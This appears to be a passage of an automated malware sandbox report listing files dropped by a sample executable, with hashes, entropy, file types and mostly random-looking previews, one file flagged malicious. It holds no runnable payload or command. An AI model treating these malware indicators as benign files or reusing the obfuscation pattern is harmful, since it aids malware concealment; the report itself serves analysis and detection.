                                                                                                                                                                          Preview:f9r7SGpP2s3uwpI27w4wYhE64..408432gZ6V4459JJA4781Tj0l7kq9zg8nF66T1F4Fj715Y..PD29957A57a8Y5Z1I2gTWRIc9439nKQnLYLn8w9O2831YJ61W99CJB3O9g522M56aK4p42It9Y528R7ju9..Ow45SO34WN104wPmLq111JDgfy..I71373NP9W57s0KAYKE1WP6wHJ86c8Ph8mZ3v84Ggan4v5JXt91t83O6Sh65u1KeT8dYXn3jqL6q2ld4tm2l7zs..Z11B4uy1kIswuV1S7UEAo2Pwf346d52029XA3aed4134BX4704o65TM0Obg0279Dn8wKo15e..x5hF06o378jgS89O42LAy6826bacjn8sD1C1l4645928851g14S28O84513yy35b66942g31F9UiFy2E3ksaGWtL8..H4Z3763z6Fg2563eET711400M5344D9tCm271H8w8lXr0iWT9w4cORO2920Q4n88Lw0tD1AB..Q3VIBD43Sr0W1i5uihk350P8jQGf1362EY2..iUFk9hd278kDF5MmC2W7Q37jMq8nT23oS228J7O0258KI04680E2..0hDv29nk28027qsqD79l9J5MM3968P0872D..81bV446111s2S7K705pI0c2I43tYsDU..6q26uh336Q133t79785ib7F0i434H61d08OA1KtCtx2w6pYf9Pu..l63b629kw1Bm932336lADB3M4em21xdmp88fx1w1V829q04K3I03Qb496Hu0rU3Q1055K7IUD48qXfj44970t..9NxAj4Vr13U3e961792e841hF043Ypc598SOnD03p4223R0fJSV7454..Ge0GF0yawlR9ynzq51ykGL8p6le3Dz8fk0c7o0604R85J67..5xq2Gowi675U3Qu7rDL7268GB884dP653S0z99V6CZT4zE66736ib9102..7c4438K2hLGTOyX528p
                                                                                                                                                                          Process:C:\Users\user\Desktop\FX6KTgnipP.exe
                                                                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):512
                                                                                                                                                                          Entropy (8bit):5.5593426480653445
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:12:e4sSdams2YBPU5CK5oPy/oVlDcHlM3QZWUUI0Dq:VsEXY65BoVElKcTUDm
                                                                                                                                                                          MD5:12F54BCDF984D85370EE7D582AF8FD88
                                                                                                                                                                          SHA1:F5DBD393CD200CA87FBC19A22C43B3EC66E3763A
                                                                                                                                                                          SHA-256:6DDE8B18B80CA1CC8C4EE5767057708B367A8FC2156EB8FCA88B3C4581461FED
                                                                                                                                                                          SHA-512:7EFD99CB19F6232C9E3516A04060C5C23517D83C5FE4E6F7D82498AB4BE78A0350301BACA677F20C854B35E99770971B34E02AFA2AD72DDCEBA0B64A38D28C9C
                                                                                                                                                                          Malicious:false
                                                                                                                                                                          Preview:Y7On6BY143705pG94D3z1AN64RnH9Y3d2WO72TwG373zp2K9UX549b9x76VrGv4J2h7n8T26kHwL0113h20928p72c1741AiTH6453jX97o3L6A8eL38aC2o56z0c8Mry6hU865I..ButtonConstants TreeViewConstants..07AQX0zxW7D63Z68ow2IMbG54109Mk22ljt33dQeCv0rgKc3D28x9u3423Wlb1x7vJH612732Hv2t1R79KQ3gfH3T2327BlMIS95mwd3A3TQ1a3c..FileConstants FontConstants..8896P9h91L695D55o28o9k056Q8vR61umG8M28iXyax36m6Y240957ypTUR4u7Tn78hn586pXml58U99uB0otV15Sr29v97ZkR9..DateTimeConstants FontConstants..v76BF1qD8YcAV4H61HE55Q1M84..ToolTipConstants ButtonConstants..
                                                                                                                                                                          Process:C:\Users\user\Desktop\FX6KTgnipP.exe
                                                                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):624
                                                                                                                                                                          Entropy (8bit):5.63236958266287
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:12:SUR75pniERdtBuM6R4i5RE22rUKXu4GAQV8jB1HpaKRj36Rc:nI47C4iD/uUz8jBnaKzcc
                                                                                                                                                                          MD5:E6EBE63BB79F7980BAE352F03F5F771F
                                                                                                                                                                          SHA1:3F3142E6EFAF627E68E9D3D151DCB7A68476C53F
                                                                                                                                                                          SHA-256:C3A17A276B8675B9251D62FE773705B10F0C741B11BD0D0315C3854A5CA5D013
                                                                                                                                                                          SHA-512:E0006FBC6D31E33F03EACA10338F79D0B166CAEA0A45A86D0812F91C4D7C0FAE9A06D66DA6DB4B2EE99EF394C5A0B20B33AE17F0C3CCFC52D390AB09480F77E7
                                                                                                                                                                          Malicious:false
                                                                                                                                                                          Preview:TR8W0qx5Z5Q9Ok0VQcJ29822b2B8O1144Yy63zGbI976TYF90sC3K8TN45R1Jatt7U24r885B6u9RluZs18wTz98z45V6p8YRL05904NIjK78vg1M311xKRWe7XY96..BorderConstants StructureConstants..5bZ2mV66vw1m90276P0PYPv32763bv3Fy49HZ4D9252XChJd409kID020Th5..FileConstants ColorConstants..T773KaS74k9Srl3OVC5ydo6M209n5t8Ki990Rg3548NE5297719XGw2g0X3W1f431k76D5RTSE7XF2p0XF2pngiOo5U2Vtw2i900b3BoO02qdoGHF1tH7..ToolbarConstants BorderConstants..hH0Ta29OT4Ko04T97ODuck56G1g2T5Jcnr03794aIg9RvO0Q63jEgqBr2pD3R739Dy9b8N255509RLJ66Z98A3LtM926bi31PkDvUU57K8644aH8c3P8434D01FiPSd263944Cwp7VwWZ52n6ZGK08t0504128y47fuS6Wfs8i52N67R8..BorderConstants StructureConstants..
                                                                                                                                                                          Process:C:\Users\user\Desktop\FX6KTgnipP.exe
                                                                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):512
                                                                                                                                                                          Entropy (8bit):5.452149920932849
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:6:I9808R1VRg/ujLWOLWMmeExNJVVCScwmajRsIuTlvVcVSc9cWCgko6t6soqX4AiV:I9E1PFzm3xZMPEdepVcVP9R1z6roqIAg
                                                                                                                                                                          MD5:F7EB2BC8A4DDC2BB4CCBC06FC5429EAF
                                                                                                                                                                          SHA1:AEC5F233A38C75521A158B35A3A712216E1E86B8
                                                                                                                                                                          SHA-256:B3AA6848FDA2014AECFDACCABB2E128B7226ED6CCB2B174B123393C8E172878A
                                                                                                                                                                          SHA-512:0F880A592F09F2DA4C60FA6514FF7B08C0CB8170BE751685C55266C2C8741A4DFD6335F2D55062AA1495750E99FEB4146EE23A4B6953BA607E33874F63AEF110
                                                                                                                                                                          Malicious:false
                                                                                                                                                                          Preview:58PFih095e64rB1Qb1lb6fH8iJBI8Q511vu7oPsZ4s0Pm8jq9e7592R2Vg90jgXwF7..UpDownConstants ComboConstants..66Jd83h78wp2pr4A8C3..DateTimeConstants DateTimeConstants..W542uO1BmF874Y..BorderConstants GuiDateTimePicker..5GBb8Q025..TreeViewConstants ButtonConstants..4Joh95t4..GuiDateTimePicker UpDownConstants..4B21l9AaE803JT40m60Nn58F74O2c5S7aB8J2Xaqe31r7Hpfy23..TreeViewConstants StructureConstants..tda8XCr909NB696zWV57w6R1D296wFqGFT08n67xPn0OeR8yjR4M5822x90QF9pKW96420gY69O7479sg8F5z41..FontConstants ToolTipConstants..
                                                                                                                                                                          Process:C:\Users\user\Desktop\FX6KTgnipP.exe
                                                                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):506
                                                                                                                                                                          Entropy (8bit):5.400734481941652
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:12:vVjQRhAu2Z9LYdc3XdrN1pAOcyErHk2zjSuP+Rc:A1y6c3XdrNrcyYE2zuc
                                                                                                                                                                          MD5:CB4ED93EEA020FF87A9DF6EFDFB9D208
                                                                                                                                                                          SHA1:C96700B3279A6B3EB93A978108EC5166C51D192E
                                                                                                                                                                          SHA-256:11D20A6342BC523291335CD9511DE02D5F47B8A8F11828B7F76E9BFD523F14DC
                                                                                                                                                                          SHA-512:35252FA1A20C48725CCAF1E261EA559D4D6156376EFB1C5E793A6EC8EA6FA7C6806164153526A056544FD0CA0F415560F1043B41FA0A6D26F4029500E010D7B1
                                                                                                                                                                          Malicious:false
                                                                                                                                                                          Preview:W1N3L0BV923KQ1401X6pa82Lu986Kyl99m5D02wU..StructureConstants FileConstants..208250Q990m5A78HP73j76u8Du17K9K37xO5S2t211fbhXplcJ40zi5P37..FontConstants ToolbarConstants..2R1m23Q1IBE96QK6IPYF1unds0m0S86593680et6aynS32QY..ButtonConstants UpDownConstants..O2j2N015yPSZSnklF59M956dak1jR681NqVbqQZYif16W..ButtonConstants ColorConstants..FNE55OD7969896Qx4IRQhj3l531G5kZt855m9651opl7S5JN..ColorConstants FontConstants..S6rjs600m8up2o36O0486D42w23R91k83Y3M2Vs346966S6212O9reKv6MB..ColorConstants StructureConstants..
                                                                                                                                                                          Process:C:\Users\user\Desktop\FX6KTgnipP.exe
                                                                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):528
                                                                                                                                                                          Entropy (8bit):5.512809673932034
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:12:iPTXGoqSQRVElqhktCU6wIAIPBPxswkfero2E:iPTWDhVUqrU6wI/PHshe0
                                                                                                                                                                          MD5:72F33CFA7A87ACA724962491FA47A632
                                                                                                                                                                          SHA1:B083A54636BAC1CAFE10CB945A5CFA06CDF10ECB
                                                                                                                                                                          SHA-256:FA2636ED27791C046440C8C9204BAC9F1B47880AAA78DC75C649360D00F57F62
                                                                                                                                                                          SHA-512:EA2BCACDC4F6A6DA5DB4DC40C61511D052C28DC52AE761F5EE160C84046778BD1D90C380DAB580DA2802232539D1ABBA565B8681B04A53E042A7E50DD0B72771
                                                                                                                                                                          Malicious:false
                                                                                                                                                                          Preview:R26qoB7lccATRhuv37aysj09393zQ1126969440671p668iGC82jNKc749L3I6Y33TAvMwulnR4X171L54790s4e54..ToolTipConstants ToolbarConstants..4oc7E8Dr6L4H9p3QM1E1Q55t6y097K33VF80D6ye3P3Lz00432978S9ClP7Dc3HHM6n4fi0b2dJzHMwO3Sovcg6Kp3wxq1A518wh6Xz77pY..StructureConstants ComboConstants..74h1Uw6M4X57349Jk51171mT6et9O5b2SO22iKh6858916hy4837738EN3P3cMILC6mT3j4o4LT7..UpDownConstants TreeViewConstants..21216k1s64h38Civ46654Oh0267dE89639tea..DateTimeConstants ToolTipConstants..w45hqSDUSr74cN2j8b7Op1P0qw8lV1b3MN..DateTimeConstants FileConstants..
                                                                                                                                                                          Process:C:\Users\user\Desktop\FX6KTgnipP.exe
                                                                                                                                                                          File Type:Unicode text, UTF-16, little-endian text, with very long lines (406), with CRLF line terminators
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):87146
                                                                                                                                                                          Entropy (8bit):3.0153405135824465
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:24:QR9999999999999993YOOOOOOOOOOOOOOOOOOOOOOOKYOOOOOOOOOOOOOOOOOOOT:EHe2ifY6W7HvU8WCuBnQhnrQ
                                                                                                                                                                          MD5:45C37769735FB6C1AA4F65457E168CF1
                                                                                                                                                                          SHA1:BD2B772E2F98E459634383329EE79AE318626A2C
                                                                                                                                                                          SHA-256:7F2FBB352244C51AFAE0217E57FBA11A8D01E8909355FEC7BA6EDBEB325FE178
                                                                                                                                                                          SHA-512:17BDE64A24332D3504A73F2223D40592ACDF0A351E0A8397BBB659A6EA7A0501D9B4513BA2A8D368DB1216CFA28485E19831D5E062FF21994B8446D3E164BCB1
                                                                                                                                                                          Malicious:true
                                                                                                                                                                          Preview:..T.e.l.e.V.r.a.m.(.4.5.).:.T.e.l.e.V.r.a.m.(.4.5.).:.T.e.l.e.V.r.a.m.(.4.5.).:.T.e.l.e.V.r.a.m.(.4.5.).:.T.e.l.e.V.r.a.m.(.4.5.).:.T.e.l.e.V.r.a.m.(.4.5.).:.T.e.l.e.V.r.a.m.(.4.5.).:.T.e.l.e.V.r.a.m.(.4.5.).:.T.e.l.e.V.r.a.m.(.4.5.).:.T.e.l.e.V.r.a.m.(.4.5.).:.T.e.l.e.V.r.a.m.(.4.5.).:.T.e.l.e.V.r.a.m.(.4.5.).:.T.e.l.e.V.r.a.m.(.4.5.).:.T.e.l.e.V.r.a.m.(.4.5.).:.T.e.l.e.V.r.a.m.(.4.5.).:.T.e.l.e.V.r.a.m.(.4.5.).:.....T.e.l.e.V.r.a.m.(.2.4.2.).:.T.e.l.e.V.r.a.m.(.2.4.2.).:.T.e.l.e.V.r.a.m.(.2.4.2.).:.T.e.l.e.V.r.a.m.(.2.4.2.).:.T.e.l.e.V.r.a.m.(.2.4.2.).:.T.e.l.e.V.r.a.m.(.2.4.2.).:.T.e.l.e.V.r.a.m.(.2.4.2.).:.T.e.l.e.V.r.a.m.(.2.4.2.).:.T.e.l.e.V.r.a.m.(.2.4.2.).:.T.e.l.e.V.r.a.m.(.2.4.2.).:.T.e.l.e.V.r.a.m.(.2.4.2.).:.T.e.l.e.V.r.a.m.(.2.4.2.).:.T.e.l.e.V.r.a.m.(.2.4.2.).:.T.e.l.e.V.r.a.m.(.2.4.2.).:.T.e.l.e.V.r.a.m.(.2.4.2.).:.T.e.l.e.V.r.a.m.(.2.4.2.).:.T.e.l.e.V.r.a.m.(.2.4.2.).:.T.e.l.e.V.r.a.m.(.2.4.2.).:.T.e.l.e.V.r.a.m.(.2.4.2.).:.T.e.l.e.V.r.a.m.(.2.4.2.).:.T.e.l.e.V.r.a.m.(.
                                                                                                                                                                          Process:C:\Users\user\Desktop\FX6KTgnipP.exe
                                                                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):588
                                                                                                                                                                          Entropy (8bit):5.533802343352673
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:12:cQsyhiAzou5VsgdyFhetxREIM+1RWZBsPcLi+:cCzosnLEI3u8QL
                                                                                                                                                                          MD5:3D5FC93EC64B6C2079A1B51D5FEBF06C
                                                                                                                                                                          SHA1:194BEE9A0558C4899CD879D6F6E39F92471AD5B8
                                                                                                                                                                          SHA-256:507B3AF5F0F26DBFD4457899DDD2C72853BF0414669BD156A098C0B23BD36507
                                                                                                                                                                          SHA-512:D1AADC47C2EC4E8AF1F636B237E86DFE534FA38A88AAA5E95DAAC543D1783D3BA8B715FED6C883CD7EC23607E4A8B3896650048A430BA8D3668FF5D6EAEDED47
                                                                                                                                                                          Malicious:false
                                                                                                                                                                          Preview:332lFM2x2NllOg8uVJxv07m415h8C88zg3046F37gm939IJQdn1a3ixB0W7A447R79ZooS378899g849RD6DM7tpl5k0Qmu47c406oT8MVKd302c32Wp1388J1323..FontConstants ToolTipConstants..J9p8m02lSu2u9..BorderConstants FileConstants..455E5hrXja2e0925DI6NX71iFP80Wd0233XOv9IT7h4b8R5698a2s4JJI4391fw5e764oL49..ToolTipConstants StructureConstants..G336eG1..GuiDateTimePicker UpDownConstants..eL19MNlp521cG099380G113eu5Qh4406QeA2xa4bH..ToolbarConstants ComboConstants..G0Pf5QB27s1L80G3N3yp76Rl4069cABR6k505XF0tK334bI26E6T1rat8NnarfW9s0qe11bhJ4C532568b2N36JG0U6G639PF75q7870980WmYZra21iV2..UpDownConstants ColorConstants..
                                                                                                                                                                          Process:C:\Users\user\Desktop\FX6KTgnipP.exe
                                                                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):534
                                                                                                                                                                          Entropy (8bit):5.548868164848912
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:12:01tYzTAZz1Nlb/9qdjmiLxRe+rzTgY4cDRt:0GzENqVma4KkcDRt
                                                                                                                                                                          MD5:7344C1EEB4D095D912F00313EED97FCA
                                                                                                                                                                          SHA1:7D042BE887275C1F43587392790162A112EB9A75
                                                                                                                                                                          SHA-256:89DCFB4C9CB90652FDE7BFDBCAEC065884AE78EBA8C6A6E4EDC5858C9CD68A8A
                                                                                                                                                                          SHA-512:F7DFD3E81215925D4E30F3919B6EBE59716C7AFC3D2C7B8189AD65D2B87887D64D7AC1C5364262997E0779B838D875C475E92BB7145972BCBEE66E63466CEE18
                                                                                                                                                                          Malicious:false
                                                                                                                                                                          Preview:CuGf5Vu..ToolTipConstants ToolTipConstants..a3065XM8203EL31Q552nZtEzF7i299mhw90uTXYDosyvHrfg58oqa04RNlPya1Srw0M3G8vY2yjJ79R7bObm6d83VDckk1435YXO06419K3Xh4eIC61J6Dg5koKZx1g3y91bt0P159288pyx3H5098404rF531..UpDownConstants DateTimeConstants..1i008ZU4d18aL0W43u5dCA7183408Z5UB75VE748e0F3COGa3Tt78952oUvbm1Npey262Pbo8t7EZd66AT33oIdAOwA5T6du4L4e13JKu065C761MlY..BorderConstants BorderConstants..4544k6PF..ButtonConstants FileConstants..JE4X8q368an7F56E4010js307KbH1p68E06QP1Ac20w579bs24F87l5bTasxzq600006632..ComboConstants ColorConstants..
                                                                                                                                                                          Process:C:\Users\user\Desktop\FX6KTgnipP.exe
                                                                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):533
                                                                                                                                                                          Entropy (8bit):5.501265161514424
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:6:kv9Rk0zcyFScOLWIq/lfU+jLWrrn67IUVeEdHPMhqSmV3AdRPhlHQ1God2jLWsd:kv9RvPmAlfpUPmeyKMVIbZQ1GoMt
                                                                                                                                                                          MD5:B3CCD694F1B2FA026EEA14F99C937B4D
                                                                                                                                                                          SHA1:849EE473B2324105DE4B579C83B94462DD3B4A12
                                                                                                                                                                          SHA-256:5D283D575AD01917B9EEB874C5E2F491DEFC8F37A2055A51EDC6A5A83CB8CBB0
                                                                                                                                                                          SHA-512:BB7D22E22477A6A719F958DF4183CB617455073F11DEA7DBAB9749BCEDAF015F80A9AB0ECEC83C262FC573F344748FB558672B22A42E2E045F15D6CFCBE4FEF9
                                                                                                                                                                          Malicious:false
                                                                                                                                                                          Preview:906356z9ijC2e7BQu791h623J0k8SL1zl3d0961D6M75949PGUPc2T526k..TreeViewConstants DateTimeConstants..MIL89j5nV31674299KP33d9270l5Uu881Vo..DateTimeConstants UpDownConstants..x407jC710652Y03Z4R6mP..GuiDateTimePicker GuiDateTimePicker..6YFEn11kU46FVS4E4kjTpem55rnRo91Jmg8o1BO6R32K740NXOnRn51241x70cTx4k3X5N73CJj94Rve74JH3E8JA4w12wGt2j92G6rX2tC1Tn485824L1jV8h080T8Q81069l679n23..ToolTipConstants UpDownConstants..7D2vq9A9047wyH169B60KRE..FileConstants ToolbarConstants..9y3587P171dlim8581kv65s8Wp5B2q43R9V..DateTimeConstants ColorConstants..
                                                                                                                                                                          Process:C:\Users\user\Desktop\FX6KTgnipP.exe
                                                                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):513
                                                                                                                                                                          Entropy (8bit):5.577482789689521
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:12:R/6fU4RxHsafRmsPKUIAmAZX8Ycg5EZ3cB5yF:R/6zMasIDcnZIIF
                                                                                                                                                                          MD5:21AE6A7F523DCDB5FD7563F31BC90559
                                                                                                                                                                          SHA1:8C725669946D1F43953ACFEE7C1979822DDB6383
                                                                                                                                                                          SHA-256:64FE0E4E963C75063AA72B0F7812251AA649C83026D21175EA1787BF578AC44C
                                                                                                                                                                          SHA-512:2E8E360690D688DE5DBE82D438122D9071243E3D893F08A9A019488EA222942381863F4253F2B5C55824198413356F810F8592992F5FD7C60E011ACEEC5E5F26
                                                                                                                                                                          Malicious:false
                                                                                                                                                                          Preview:omC3psp75oku7rS6P9pGVk3h0W71JBPT0lMdU6iCR203s6p9XS3iP59dcV0tPh8ipr9bB9qaZ49qK6eH184Vd..FileConstants BorderConstants..p1nW6Q75173O8W28XBekVyjVZNu46j..GuiDateTimePicker ButtonConstants..jb70q501AVG54f9..ToolbarConstants ColorConstants..w07086134yauY3761k0F0LmYiY57ccxnq5M73W1P6Y393dfU37910N7F9dMqhXRpQ775DW69DE2594os70364wd..ButtonConstants ToolbarConstants..6N4p41G05GLnm667U05o66O11Z0y00W93Z9b8944h84B6L7A661LF13g1v0q19471d6QA4Io5oGzmdA554Q295632727CT1G10qxW1QEZryfqH3258Y1F2Opz..FileConstants ToolTipConstants..
                                                                                                                                                                          Process:C:\Users\user\Desktop\FX6KTgnipP.exe
                                                                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):629
                                                                                                                                                                          Entropy (8bit):5.4666634467841275
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:12:xTIhETVFPzys1Jk0F3A/qSvJhqit54IvLAW:xae64uy3A/qcJjR/
                                                                                                                                                                          MD5:40B63329BF087953369FE3DE16919B80
                                                                                                                                                                          SHA1:1FE7ECCDB003E34310A3BCCBA863A144F0580F4C
                                                                                                                                                                          SHA-256:0C2EDB2430D54BFD603A371749C042B18B4D7F9F18CC3853EDF583914CB5E438
                                                                                                                                                                          SHA-512:2EDDC811D1C979D2698166F25B17B82D67A993E20B4E9AB169275DAD9E425F2FCECCF3E9CCAB16F212DF53F1705EB1E528510A826AF571C73255C3EC9BAE3B2C
                                                                                                                                                                          Malicious:false
                                                                                                                                                                          Preview:Tw8340E42949L0168b4hs0y5o3EGhC79kIWo4Qik6GY7702..BorderConstants ColorConstants..34PvWaR..TreeViewConstants ButtonConstants..y21w3088e4T25Ty5O8muSo5zqu270CI42048L8lC433xDRky17t9922P23qEoR60JO44q8ax02t4Z61t3Nxhxq2H0dl5vh62198psz8n65Xl..FileConstants ColorConstants..P280D33N1RlP004pB7QBi85shBaK4yRB002909h5Q54J23Nlp0732iB2S6j2Nu28201BM039w456MyQb79Lt6Z0hcNd910253fx0W82504Y5O4Y1S35o3862DPX..BorderConstants ToolTipConstants..y7jvlFx9Pbm26X679503L9e8Tj8C1za33i80qMg6n67bdHkH62j57428246R77332o4588GwdwW3887VE9730K6Pl425snk147PqB2i3x581552Y22v00D29d02M2f3Nu2D4d2o4066342N6Sf10ufE929912m8ts34101YFwkc..ButtonConstants ComboConstants..
                                                                                                                                                                          Process:C:\Users\user\Desktop\FX6KTgnipP.exe
                                                                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):598
                                                                                                                                                                          Entropy (8bit):5.59934887046669
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:12:7NGrT9Qjj8C7kJhQhz8lokTP2jQv25qdM7BKATkRh8p/1Gj/Ll1R/diTM:BETyjj87vQhz8gGfIBKATCE1ur/db
                                                                                                                                                                          MD5:D181B371EED7ECFD2FEB22601E015CAE
                                                                                                                                                                          SHA1:224861B9E9C3AAD2A3D189B06487511AD9DA8C7F
                                                                                                                                                                          SHA-256:DEE002A09347837FB5DC5368763DEE8B516B8E27D17935EEB73FB2A7F4D2A220
                                                                                                                                                                          SHA-512:0738520DAEBF468AC5B2FA71D3596F6ABD5956EC7A12391E16E8257DC5042E58040C8713125A8F62FD795862D080C00CAA758A7470DE4CAD779257E37510491F
                                                                                                                                                                          Malicious:false
                                                                                                                                                                          Preview:Q9Gj6b4B76us56e8C5C7yGx1690k3k2F5729AiH4988n648MpM80O15vjs3Ds9FZG537F759599Kh59PEUT0p4H02WNkqA7G257q1PN2u87m42nbh0X0L54465r887..StructureConstants FileConstants..A0nr3339140H54iJSwPfqQf11Tkr7Q8O889398HNRta53JPdx8qC..TreeViewConstants ToolbarConstants..53LP3IDvFbR5J80tYGzKy30Q7vAkf8NHDZ49h6h556FtA19JMc0KK174L7JE6o1s46ab954I33TNF43w1vk02300hd3GX67hFI74g4230ySQA476F6q3G41E..UpDownConstants UpDownConstants..3O5O08fF72u642b62eJDgydBJ1QmGstr4r48B6qg115J21407AHX72W599XnP50yd31401N2734n6S4P1Jzj07AE4ChlZ552T20hH6jG4oW345aA4MqxCH310f54Kp2sW7n78J3igD5yi28GJn3a5f287141d..ComboConstants UpDownConstants..
                                                                                                                                                                          Process:C:\Users\user\Desktop\FX6KTgnipP.exe
                                                                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):596
                                                                                                                                                                          Entropy (8bit):5.5447068455678234
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:12:w9Xf8t2eoxhWf1SOK0IQO/0dWqMpEzaa6mAcxN0:w9Xs2eoGf0jQO9pEzHhAON0
                                                                                                                                                                          MD5:4F1DAD84085CD5BE9D40662DDE2CC6C2
                                                                                                                                                                          SHA1:D0E8632CDBA8D2B0D2B7F35929E1BB9BDDC2D426
                                                                                                                                                                          SHA-256:490E821B0B1933343886DF46521788A015FBA608E67DD325BF5C861D7E21C358
                                                                                                                                                                          SHA-512:48011F6F7A5A451AB342F30A5FD10D64B729868D251E65A249ABC436CE032959CFD05D1FB19B57D8CBD858994DEE9408AB1881D4DDD393B399330587A90DA578
                                                                                                                                                                          Malicious:false
                                                                                                                                                                          Preview:Uo4E3Z7tyK..ToolbarConstants GuiDateTimePicker..Ov791uT433ag28M22S9zI815SwG688bb25O771N952n6kNm5V62Ko759pr64B0xWs5KM930076921K..ToolbarConstants DateTimeConstants..bi6M2DZf8xQHXx076Z3V6B4381J3293730ZY0aG27P4owJsPbo900c08fTDG9WHUtl840XGCvvCm97p04Qr49O4q19..FontConstants UpDownConstants..M9nwG09g2QJ09oj6uhP2ii81xs4W1443S6b3559wH1r89Y7eP162tUf6sfY3a2034u95P06680g358..ButtonConstants UpDownConstants..P5Q2HZ38196s3mf52k2LCoEnYj7M73P2V4s14n335689yQkA2114i6440TcTsD5MC5vAR64380d10IBrf42i55qJbWFdO56K9SUevxN4008vstI0O8b392fSx72o2c0a200k9WW6611y90EAPX3Xw39L4226b8759..ButtonConstants BorderConstants..
                                                                                                                                                                          Process:C:\Users\user\Desktop\FX6KTgnipP.exe
                                                                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):571
                                                                                                                                                                          Entropy (8bit):5.5797013585600395
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:12:/HC1eTxrZxShOn8V9rfIrWum3deZ+3Sb/GM1BPc:/i1e1rf5n49rQWn3wcQBO
                                                                                                                                                                          MD5:701A40E797BF193BF1B078ACC8B08D8F
                                                                                                                                                                          SHA1:9AAA897C2EB6C09F60887020D6E0E6FB6793D1E7
                                                                                                                                                                          SHA-256:81883C3AF3BC76D202A2E2A499627B13D09CD7E3EBFF443BF854329BCFB9A3A9
                                                                                                                                                                          SHA-512:8E4946C3FC21D77F3BC267287D202804BDD38C501446EA008F65718A3BDBF5FC05AE3443336BF7A7D3CB60EB473B6CFD29F63D8DA1D8C43FBAB9A9B35E5BB136
                                                                                                                                                                          Malicious:false
                                                                                                                                                                          Preview:4M4e123y813Q909y5o4L4sQv31qckhv715v3p88N22222pODEo3h69YXF4694361vw092IICqIgJD44aP7z4715o3T350RO84r0jsD664HhTeZ7vA5Z721L582LkS..FileConstants ColorConstants..jSGz6f4AGJ2k6ycRm79zywdOa5b640F01Z7w44xG61e8r11Z75qOyz64305NA9jV974y4222S5V5Q8W111yw0QM..ToolbarConstants ButtonConstants..3T6lSlO1kBqPR640E13B88B72GH9345392uId456352i0o29pVr508..BorderConstants DateTimeConstants..B7w33pKO5lfUU978g73buN8lCv4..DateTimeConstants FontConstants..9059j2hH51CowjY9cKcSn2X0p7335p172t2031wps95E76H7562DT3V52Fdel361931g0G714dwM68VUfw180Zxc9LBM954jhG64..ToolTipConstants TreeViewConstants..
                                                                                                                                                                          Process:C:\Users\user\Desktop\FX6KTgnipP.exe
                                                                                                                                                                          File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):126003968
                                                                                                                                                                          Entropy (8bit):7.032325966137812
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:196608:VuJdrXFG9geFdXFEq2JXYLsAU62B+HkeCKjdTuSuth8gidLIwyYXE24jcg1hSng3:u
                                                                                                                                                                          MD5:3F7DDC4ECBDAF26A3CA18881DBCB0444
                                                                                                                                                                          SHA1:87B7AD58BB268E450C8F6A3DA3A9BBF782F7293A
                                                                                                                                                                          SHA-256:2077070EC9BD352469129F6AA8CAF53BE0E4A9ED642BE8258203B428CE6FEC21
                                                                                                                                                                          SHA-512:A66A60C3034519442DE13C3A4D02F4135D54B1FE971A8B994C5CD525603B5C77B5EBF8276A665FE5B97D157C637587E981556C2C5CFD4504ADE37667059439C7
                                                                                                                                                                          Malicious:false
